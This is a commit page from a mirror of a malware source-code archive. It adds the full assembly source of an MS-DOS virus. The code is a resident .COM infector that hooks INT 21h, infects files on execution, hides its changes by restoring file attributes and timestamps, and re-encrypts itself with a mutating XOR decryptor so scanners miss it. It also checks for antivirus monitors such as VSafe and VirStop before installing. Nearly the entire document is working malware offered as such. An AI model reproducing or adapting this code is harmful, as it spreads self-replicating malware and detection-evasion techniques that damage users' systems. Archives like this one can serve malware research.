daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:58:25 -06:00
committed by GitHub
parent b60161f008
commit 5dd4938a52
99 changed files with 41606 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.rtm.asm
+543
View File
@@ -0,0 +1,543 @@
ORG 0100H ; ..
Virii label Near ; Start adress CS:0100H
;
Mutate Proc Near ; The Decryption/encryption code begin here ..
Cmp Ax,01100H ;
J_N_E: ; Adress of the byte to change
JA ByeBye ; Will change for an 'JNE'
ExitFromINT21: ;
TTT: ;
ThePush: ;
Push Si ;
TheMov: ;
Lea Si,TheBody ;
Work: ;
theXor: ;
DB 02EH,081H,034H ; XOR W[Cs:Bx], ..
Mask Dw 0 ; Decryption/Encryption Key
TheAdd: ;
Add Si,2; ;
TheCmp: ;
Cmp Si,ViriiEnd-3 ;
Jb Thexor ;
ThePop: ;
Pop Si ;
; ;
Cmp B[Cs:FromTheHandler],1 ; The handler is calling?
Jne TheBody ; No
;
ExitWithREt: ;
Mov B[Cs:FromTheHandler],0 ;
PopA ;
ByeBye: ;
DB 0EAH ; Jmp Far
OLDINT21 DD 0 ;
; ;
FromTheHandler DB 0 ; Set to 1 if INT 21h handler call
; ;
Mutate EndP ; End of the procedure
TheBody Proc Near ; This Part is encrypted With the key "Mask"
PushA ; 286 & +
Call ChangeDecryptor ;
Cmp B[Cs:InTSR],1 ; Is it an INT 21h Call ?
Jne installit ;
Jmp Near INT21handler ; Yes .. jump to the handler
installit: ; Virus installation is done here
Mov B[inTSR],1 ; Indicate that the virus is in service
Mov B[J_N_E],072H ; 'JNE'
;;;;;;;;
Mov Ax,Cs ; ----- Reserve memory Block
Dec Ax ; Point to the MCB
Mov Ds,Ax ;
Mov Cx,W[Ds:3] ; Read the Size of the memory block
Sub Cx,VirSize2 + 20 ; Memory occuped by the Virus
Mov Bx,Cx ;
Mov Ah,04Ah ;
int 021H ;
Mov Bx,-1 ;
Mov Ah,048H ;
Int 021H ;
Mov Ah,048H ;
Int 021H ;
Dec Ax ;
Mov Ds,Ax ;
Mov W[1],0008 ; Set it as DOS SYSTEM AREA (heheheh)..
;;;;;;;;;; ;
Inc Ax ;
Mov Es,Ax ; Destination Seg:Off
Mov Di,0100H ; ES:DI ==> destination
Push Cs ; Source Seg:Off
Pop Ds ; Set Ds to the current segment
Lea SI,virii ; DS:SI ==> source
Mov Cx,VirLength ;
Cld ;
Repz ;
Movsb ;
Mov W[Es:Mask],0 ;
;;;;;;;;; ;
Cli ;
Mov Ds,Cx ; Ds to 0
Mov Ax,W[Ds:084H] ; Offset of the handler
Mov W[Es:Oldint21],AX ;
Mov Bx,W[Ds:086H] ; Segment of the Handler
Mov W[Es:OldInt21+2],Bx ;
Sti ;
Push Es ;
Push Di ;
Push Si ;
Call MemoryVerifier ;
Pop Si ;
Pop Di ;
Pop Es ;
Jc AnotherDayMaybe ;
;;;;;;;;; ;
;
Cli ;
Mov W[0413H],Ax ; Set Int 21 handler
Mov Ax,0100H ;
Mov W[0084H],Ax ;
Mov Ax,Es ;
Mov W[0086h],Ax ;
Sti ;
Jmp Ok ;
;;;;;;;;;;;;;;; ; The handler is now installed
; We have to Jump Far Far ..
AnotherDayMaybe:
Mov Ah,049H
Int 021H
Ok:
; And Encrypt It with a new Key
; Jump To The virus In mem
Push Cs ; Save CS twice for later Uses
Push Cs ; Do not forget : CS represents the segment
; Of the previously infected application !
;
Push Es ;
Push JumpTHere ; Store offset and segment on the Stack
RetF ; & jump
;---- This part run in "memory"
JumpTHere: ;
DecryptEndOfFile: ; Decrypt original application code
Pop ES ; ES & DS set to the PSP segment
Pop Ds ;
Mov Di,Cs:[FileSize] ; Destination
Add Di,0100H ; PSP Size (256 bytes)
Mov Si,Di ; Source
Push Si ;
;Mov Cx,VirLength ;
;Mov Dl,B[Cs:LocalKey] ; Local File Decryption Key
;Here2: ;
;LodsB ;
;Xor Al,Dl ;
;StosB ;
;Loop Here2 ; Decrypt the File
;
CopyEndOfFile: ; Now Copy The original code
Mov Cx,VirLength ;
Pop Si ;
Mov Di,0100H ; To the begining
Cld ;
Repz Movsb ; & Blit
; The Job of the virus launcher is finished
; We can now execute the infected file ..
;RESTORE REGISTERS
Mov W[Cs:Mask],0 ; we are not encrypted in the moment
PopA
Push es
Push 0100H
RetF
;****************************** ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
;****************************** º Features: º
;** Decryptor Mutator ** º 1 .3 different encryptor/decryptor º
;** By X ** º 2 .Automatic size checking º
;** 15-3-93 ** º 3 .Expansion possibilities º
;****************************** º 4 .The smollest code º
;****************************** ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ChangeDecryptor Proc Near
Push Ax
Push Bx
Mov Al,5
Mov Bl,B[Cs:ThePush]
Cmp Bl,053h
Je BxIsTheRegister
Cmp Bl,057H
Jne SiIsTheregister
Mov Al,4
Jmp MutateTheCode3
SiIsTheRegister:
Mov Al,1
BxIsTheRegister:
MutateTheCode3:
Xor B[Cs:ThePush],Al ; Switch To SI register
Xor B[Cs:ThePop],Al ; //
Xor B[Cs:TheMov],Al ;
Xor B[Cs:TheAdd+1],Al ;
Xor B[Cs:TheCmp+1],Al ;
Cmp Al,1 ;
Je MutationDone ;
Sub Al,2 ;
MutationDone: ;
Xor B[Cs:TheXor+2],Al ;
Pop Bx
Pop Ax
RET
;FVBM proc near ; First five bytes mutator
;PushA
;Lea Si,CodeTable ; Offset of our table
;Push Cs ;
;Push Cs ;
;Pop Ds ;
;Pop Es ;
;Add Si,B[Cs:pointer] ;
;Mov Cx,0005 ; Copy 5 bytes
;Cld ;
;RepZ MovSB ; Blit
;Add B[Cs:pointer],5 ;
;Cmp B[Cs:pointer],25 ; are we at the end of the table
;Jne Allright1 ;
;Mov B[Cs:pointer],0 ;
;Allright1: ;
;Mov Ax,02CH ; Input from the timer
;int 021H ;
;Xor Dh,Dl ;
;Mov B[Cs:Mutate+1],Ch ;
;Xor Dl,Cl ;
;Mov B[Cs:Mutate+3],Dl ;
;PopA ;
;Ret ; return to the caller
;CodeTable: ;
One1 : Mov Ah,0 ;
;; Sub Al,0 ;
; Nop ;
; ;
;Two2 : mov Ch,0 ;
; add Bl,0 ;
; Cld ;
; ;
;Three3: adc Cl,0 ;
; sub Ch,0 ;
; Stc ;
;
;Four4 : Mov Bh,0
; Mov Cl,0
; Nop
;
;CodeTableEnd:
;Pointer Db 0 ;
;
;
;******************************
;******************************
;** Resident part **
;** By X **
;******************************
;******************************
HideINT21H Proc Near ;
PopA ;
Mov Bx,W[Cs:OLDint21] ;
Mov Es,Bx ;
Mov Bx,W[Cs:Oldint21+2] ;
Iret ;
;
INT21Handler proc ;
Cmp Ax,04B00H ;
Je Exec ;
;Cmp Ax,03521H ;
;Jne NoHide ;
;Call HideINT21H ;
;NoHide: ;
;Cmp Ax,02521H ;
;Jne Nothinginterresting ;
;Call SimulateINT21H ;
Nothinginterresting: ;
Mov B[Cs:FromTheHandler],1 ;
Jmp ExitFromINT21 ;
Read: ;
Exec: ;
Mov Ax,03D02H ;
Int 021H ;
Jnc OpenSuccess ; Good ..
Jmp OpenFailed ; This operation Failed ..
OpenSuccess: ;
Mov W[Cs:Handle],Ax ;
Mov Si,Dx ; VeriFy if the file has a .COM extension
HereX: ;
Lodsb ;
Cmp al,'.' ; Searh for the Dot
Jne HereX ;
Dec Si ;
Dec Si ;
Dec Si ;
LodsW ;
Or Ax,02020H ;
Cmp Ax,'dn' ; Test For command.com
Jne NotCommand ;
Jmp ExitSimple ;
NotCommand: ;
Lodsb ;
Lodsb ;
Or Al,20H ; .
Cmp Al,'c' ; C
Je ContinueX ;
Jmp ExitSimple ;
ContinueX: ;
LodsW ;
Or Ax,02020H ; O
Cmp Ax,'mo' ; M
Je ComType ;
Jmp ExitSimple ;
ComType: ; Now for Command.COM
;;;;;;;;; ;
Push Ds ;
Push Dx ;
Mov Al,2 ; To the end
Call Seek0 ;
Pop Dx ;
Pop Ds ;
;;;;;;;;; ;
Push Ax ;
Push Cx ;
Push Dx ;
Mov Ah,02CH ;
Int 021H ;
Mov Cx,Ax ;
Xor Cx,Dx ;
Mov W[Cs:Mask],Cx ; Use file size as mutation key
Pop Dx ;
Pop Cx ;
Pop Ax ;
Mov W[Cs:FileSize],Ax ; Save File Size for the Mutation heritant
Cmp Ax,Virlength ; The file is too small?
Jnb NotSmall ;
Jmp ExitSimple ; Nop !
NotSmall: ;
Cmp Ax,64000 ; The file is too big?
Jna NotBig ;
Jmp ExitSimple ; No No
NotBig:
;;;;;;;;;
Mov Ax,04300H ;
Int 021H ;
Mov W[Cs:OldAttr],Cx ; Okey .. we have all we need
;;;;;;;;;
Mov Bx,W[Cs:Handle]
Mov Ax,04301H
Xor Cx,Cx
Int 021H
;;;;;;;;;
Push Ds ; Save For later uses (attributes)
Push Dx ;
;;;;;;;;;
Mov Ax,05700H ;
Int 021H ;
Mov W[Cs:OldTime],Cx ; Save File Time
Mov W[Cs:OldDate],Dx ; Save File date
And Cx,01FH ; Several viruses use this indicator (second=62)
Cmp Cx,01FH ;
Jne NotInfected
Jmp CloseAndExit ; Infected .. leave it alone .
NotInfected:
;;;;;;;;; ;
Xor Ax,Ax ; Seek to the Begining of the file (AL=0)
Call Seek0 ;
;;;;;;;;; ;
InfectTheFile: ; I love this part !
Mov Bx,W[Cs:Handle] ;
Mov Ah,03FH ; Read The Top of the File
Push Cs ;
Pop Ds ; To The buffer ..
Lea Dx,ViriiEnd ; The buffer is located at the end of the virus
Mov Cx,Virlength ; Number of bytes to read
Int 021H ; (ViriiEnd = virlength+0100h)
Jnc Continue6 ;
Jmp CloseAndExit ; Something is going wrong
Continue6: ;
;;;;;;;;; ;
Mov Al,2 ; Seek To the end
Call Seek0 ;
;;;;;;;;; ; Encrypt the Code
Mov Bx,W[Cs:Mask] ; get the virus Mask
Mov Ah,02CH ; Get a random Value
Int 021H ; From the timer
Xor Bx,Dx ; Good Good ...
Mov B[Cs:LocalKey],Bl ; Use This as The original code encryptor
Mov Dl,Bl
;;;;;;;;; ;
;Mov Cx,Virlength ; Encrypte the original code to make it harder
;Lea Bx,ViriiEnd ; to detect by virus scanners.
;Here4: ;
;Xor B[Cs:Bx],Dl ;
;Inc Bx ;
;Loop Here4 ;
;;;;;;;;; ;
Lea Dx,ViriiEnd ;
Push Cs ;
Pop Ds ;
Mov Bx,W[Cs:Handle] ;
Mov Cx,Virlength ;
Mov Ah,040H ; Write the code to the end
Int 021H ;
Jc CloseAndExit ; Bad ..
;;;;;;;;; ;
Xor Ax,Ax ;
Call Seek0 ; Seek to the begining of the file
;;;;;;;;; ; Copy The viral code to the peace of code
; we read
Mov B[Cs:J_N_E],077H ;
Mov B[Cs:InTSR],0 ;
Push Cs ;
Push Cs ;
Pop Ds ;
Pop Es ;
Lea Si,Mutate ; First We Blit The Mutation Engine
Lea Di,ViriiEnd ;
Mov Cx,MutatorSize ;
Cld
Repz MovsB ;
Mov Cx,BodySize2 ; And blit the body after some mutations
Mov Bx,W[Cs:Mask] ; Mouahahahah ...
Here5: ;
LodsW ;
Xor Ax,Bx ;
StosW ;
Loop Here5 ;
;;;;;;;;; ;
Mov B[Cs:J_N_E],072H ;
Mov B[Cs:InTSR],1 ; And restore the TSR Flag
Push Cs ;
Pop Ds ;
Mov Dx,offset ViriiEnd ;
Mov Bx,W[Cs:Handle] ;
Mov Cx,Virlength ;
Mov Ah,040H ; Write The Virus
Int 021H ;
; ;
CloseAndExit: ;
Mov Bx,W[Cs:Handle] ;
Mov Ax,05701H ;
Mov Cx,W[Cs:OldTime] ; Set File Time
Mov Dx,W[Cs:OldDate] ; Set File date
Int 021H ;
;
Pop Dx ;
Pop Ds ;
Mov Ax,04301H ;
Mov Cx,W[Cs:OldAttr] ; Okey .. we have all we need
Int 021H ;
ExitSimple: ;
Mov Bx,W[Cs:Handle] ;
Mov Ah,03EH ; Close The File
Int 021H ;
OpenFailed: ;
Mov B[Cs:FromTheHandler],1 ; This is the handler
Jmp ExitFromInt21 ; Give me another monstreous mutation !
;
Seek0: ;
Xor Cx,Cx ;
Seek: ;
Mov Ah,042H ; Seek to the end or to the begining of the file
Xor Dx,Dx ; Xor Dx,dx
Mov Bx,W[CS:Handle] ;
Int 021H ;
Ret ;
;******************************
;******************************
;** Memory Verifier **
;** By X **
;** 18-03-1993 **
;******************************
;******************************
MemoryVerifier Proc Near
Stc ; Set the carry Flag
Cmp Ax,0100H ; The Virus is installed At ????H:0100H
Je NoWay ; Do not take the risk
Cmp Ax,0362H ; VirStop is installed (Fprot) ..nonono
Je NoWay ;
;
Mov Ax,0FA00H ; Test for vsafe (Central Point) ..nonono
Xor Di,Di ;
Mov Dx,05945H ;
Int 013H ;
Cmp Di,04559H ;
Je NoWay ;
;
Mov Ax,0FF0FH ;
Int 021H ; VirexPc/Flushot INSTALLATION CHECK
Cmp Ax,101H ;
Je NoWay ; Never , never , never !
;
Mov Ax,04B4DH ; Murphy 2 INSTALLATION CHECK
Int 021H
jnc NoWay ; Nah !
;
Mov Ax,04B59H ; Murphy 1 INSTALLATION CHECK
Int 021H ;
Jnc NoWay ; Murphy 1 is resident
;
Mov Ax,04BFFH ; CASCADE,Justice & 707 INSTALLATION CHECK
Xor Si,Si ; Si&Di to zero for CASCADE
Xor Di,Di ;
Int 021H
Cmp Bl,0FFH
Je NoWay ; 707 is resident
;
Cmp Di,055AAH
Je NoWay ; Cascade or justice is resident
;
Mov Ax,0357FH ; AgiPlan INSTALLATION CHECK
Int 021H
Cmp Dx,0FFFFH ;
Je NoWay ; AgiPlan is installed
;
Mov Ax,04243H ; Invader INSATLLATION CHACK
Int 021H
Cmp Ax,05678H
Je NoWay ; Invader is resident
;
Clc ; Okey ..
Jmp return
Noway:
Stc
return:
Ret
MemoryVerifier EndP
DatasArea: ; For Datas storage.
SizeOfTheHole DW 0
FileSize DW FileLength ; The size of the infected File
inTSR DB 0
LocalKey DB 0
Victim_Releated_Datas:
Handle DW 0
OldAttr DW 0
OldTime DW 0
OldDate DW 0
ViriiEnd:
;Constante
VirLength EQU (ViriiEnd-Virii)
VirSize2 EQU (Virlength/16) * 2
VirSize4 EQU VirSize2 * 2
VirLength2 EQU Virlength/2
MutatorSize EQU TheBody-Mutate
BodySize EQU ViriiEnd-TheBody
BoDySize2 EQU BoDySize/2
TheCenter:
Db 300 dup (0)
TheCodePart:
Db (Virlength-5) dup (90h)
Mov Ax,04C00h
Int 021H
EndOfFile:
FileLength equ TheCodePart-virii